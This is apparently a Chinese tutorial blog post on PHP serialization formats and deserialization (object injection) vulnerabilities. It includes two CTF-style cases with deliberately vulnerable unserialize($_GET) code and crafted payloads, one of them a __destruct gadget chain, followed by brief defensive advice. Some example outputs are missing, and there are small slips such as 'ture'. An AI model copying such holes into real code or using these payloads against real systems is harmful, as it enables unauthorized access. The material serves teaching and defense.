序列化与反序列化基础及反序列化漏洞(附案例)

参考文章：

[web安全原理]PHP反序列化漏洞 - 笑花大王 - 博客园 (cnblogs.com)

一、概念

        为了能有效的存储数据而不丢失数据的类型和内容，经常需要通过序列化对数据进行处理，将数据进行序列化后，会生成一个字符串，字符串包含了序列化前的数据的信息，交由反序列化函数处理后，即可复原数据。

        而在PHP中常用的序列化和反序列化函数则有：序列化函数(serialize、json_encode)，反序列化函数(unserialize、json_decode)

二、PHP序列化

        这里着重介绍serialize函数

1、NULL序列化

        NULL将被序列化为N;：

        示例代码：

<?php
$text = NULL;
echo serialize($text);

        输出结果：

2、Boolean序列化 

        bool类型将被序列化为(b:value;):

        示例代码：

<?php
$text = true;
echo serialize($text);

        输出结果：

3、int序列化

        int类型将被序列化为(i:value;):

        由于在PHP中声明变量时不需要显式的将数据类型标出，因此当超出了int类型的范围（通常是-2,147,483,648到2,147,483,647）时，会被PHP解析为double类型

        示例代码：

<?php
$text = 123;
echo serialize($text);

        输出结果：

4、double序列化 

        double类型将被序列化为(d:value;)：

        在PHP中类似于1.23和超出int类型范围(如:123124315213412512)的数据，通常都会被解释为double类型

        示例代码：

<?php
$text = 12.3;
$text1 = 123124124124123124;
echo serialize($text)."<br>";
echo serialize($text1);

         输出结果：

5、String序列化 

        String类型将被序列化为(s:length:"value")：

        示例代码：

<?php
$text = "e3xplolt-hada";
echo serialize($text);

        输出结果：

 6、Array序列化

        Array将被序列化为(a:length:{i:index;value(对应数据序列化后的结果如NULL则是N;);}):

        示例代码：

<?php
$text = array();
$text[0] = NULL;
$text[1] = true;
$text[2] = 123;
$text[3] = 1.23;
$text[4] = 123124315213412512;
$text[5] = "e3xplolt-hada";
echo serialize($text);

        输出结果：

 7、Object序列化*

        Obeject将被序列化为

(O:class_name_length:"class_name":value_num:{s:value_attribute(1,2+class_name_length+value_name_length,3+value_name_length):"value_name";value_type:value;})若属性为private则value_name为(class_name.value_name)，若属性为protected则value_name为(*.value_name)

注： class_name=类名、class_name_length=类名长度

        value_name=变量名、value_name_length=变量名长度、value_type=变量类型(如int、bool)、value_attribute=变量属性(如public、private和protected)、value_num=变量个数

        其中value_attribute后的1,2,3则分别代表public，private，protected，如在test1类内有一个变量为private $b="789"，则序列化后value_attribute值为2+class_name_length(test1长度为5)+value_name_length(b长度为1)，即2+5+1=8，所以为8

        示例代码：

<?php
class test1{public $a;private $b="789";private $ca="aacc";protected $c123=456; 
}
$test = new test1;
$test -> a = 123;
echo serialize($test);

        输出结果：

O:5:"test1":4:{s:1:"a";i:123;s:8:"test1b";s:3:"789";s:9:"test1ca";s:4:"aacc";s:7:"*c123";i:456;}

三、PHP反序列化

1、魔术方法

        __wake与__unserialize

        当对序列化后的对象进行反序列化时，在PHP存在类似于__wakeup和__unserialize魔术方法，每次unserialize函数对对象进行反序列化操作时，都会尝试调用这个对象所属类中的__wakeup和__unserialize方法，如果存在就会执行

        注：若__wakeup和__unserialize方法同时存在，则__wakeup方法会被无视

        示例代码：

<?php
class test1{public $a;public function __wakeup(){echo "<br>"."e3xplolt-hada";}
}
$test = new test1;
$test -> a = 123;
echo serialize($test);
$test123=serialize($test);
$test=unserialize($test123);

        输出结果：

        __destruct

        该魔术方法会在某个对象不再被调用或者对象被销毁时调用

        示例代码:

<?php
class test1{public $a;public function __destruct(){echo "<br>"."e3xplolt-hada";}
}
$test = new test1;
$test -> a = 123;

         输出结果：

        

四、反序列化漏洞

1、漏洞成因

        反序列化函数传入参数可控

        类内存在魔法函数

2、案例分析

        unserialize函数传参可控

<?php
include "./flag.php";
class user{public $password="xxxxxx";public $username="xxxxxx";public $isadmin='e3xplolt-hada';public function login($u,$p,$id){if($this->username===$u&&$this->password===$p){$this->checkadmin($id); }}public function checkadmin($id){if($id===$this->isadmin){global $flag;echo "hello,admin:".$flag;}}
}
$user=unserialize($_GET['ser']);
$user->login($user->username,$user->password,$user->isadmin);

        分析代码：

        我们可以发现在函数unserialize中存在可控制的变量$_GET['ser']，同时他会在之后调用该类下的login方法，因此正常业务逻辑应为传输用户序列化后的信息给unserialize函数，再通过login进行登录并检测权限，但由于这里的传参未经正确的处理因此产生反序列化漏洞。这里可通过构造一个对象其$password变量为xxxxxx，$username变量为xxxxxx，$isadmin变量为e3xplolt-hada即可，因此我们有如下脚本可生成payload

        脚本代码：

<?php
class user{public $password="xxxxxx";public $username="xxxxxx";public $isadmin='e3xplolt-hada';
}
$text = new user;
echo serialize($text);

        payload:

O:4:"user":3:{s:8:"password";s:6:"xxxxxx";s:8:"username";s:6:"xxxxxx";s:7:"isadmin";s:13:"e3xplolt-hada";}

输出结果为：hello,admin:flag{hardtowork}

        魔术方法使用不当

<?php
include "./flag.php";
class user{private $username='xxxxxx';private $password='xxxxxx';private $isVip=false;private $class = 'info';public function __construct(){$this->class=new info();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}}class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}class backDoor{private $code;public function getInfo(){if($this->code==="givemeflag"){global $flag;echo $flag;}}
}
$user = unserialize($_GET['ser']);

         分析代码：

        分析代码可知如果我们想要获取flag，我们需要尝试用一个属于backDoor类的对象，去调用getInfo方法，并且该对象的私有变量code必须是字符串"givemeflag"。

        通过观察类user发现他会在创建一个新对象时，创建一个Info类的对象，并存储在class中。

        同时我们发现，当user类下的对象不再被调用或被销毁时会调用class所存储的对象所属类下的getInfo方法。

        从上面的分析我们可以得出突破口在__destruct方法中，若我们利用$user = unserialize($_GET['ser']);传入一个对象，该对象内部的变量class所存储的对象属于backDoor类，且该对象内的code变量值为"givemeflag"，当对象被销毁时，则会自动调用backDoor类下的getInfo函数，获取flag

        脚本代码：

<?php
class user{private $username='xxxxxx';private $password='xxxxxx';private $isVip=ture;          private $class = 'backDoor';public function __construct(){$this->class=new backDoor();}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function __destruct(){$this->class->getInfo();}
}
class info{private $user='xxxxxx';public function getInfo(){return $this->user;}
}
class backDoor{private $code="givemeflag";public function getInfo(){if($this->code==="givemeflag"){global $flag;echo $flag;}}   
}
$p=new user();
$a=serialize($p);
echo urlencode($a);

        payload:

 O%3A4%3A%22user%22%3A4%3A%7Bs%3A14%3A%22%00user%00username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A14%3A%22%00user%00password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A11%3A%22%00user%00isVip%22%3Bs%3A4%3A%22ture%22%3Bs%3A11%3A%22%00user%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A10%3A%22givemeflag%22%3B%7D%7D

注：需保留URL编码，否则不认，原因暂不清楚

五、防御手段

        针对反序列化漏洞，我们需要着重观察函数unserialize及json_decode，注意可控参数的过滤

        同时关注类中如果出现魔术方法如__unserialize、__wakeup、__destruct时，需谨慎对待，过滤传参，保护其下的敏感函数如eval，system等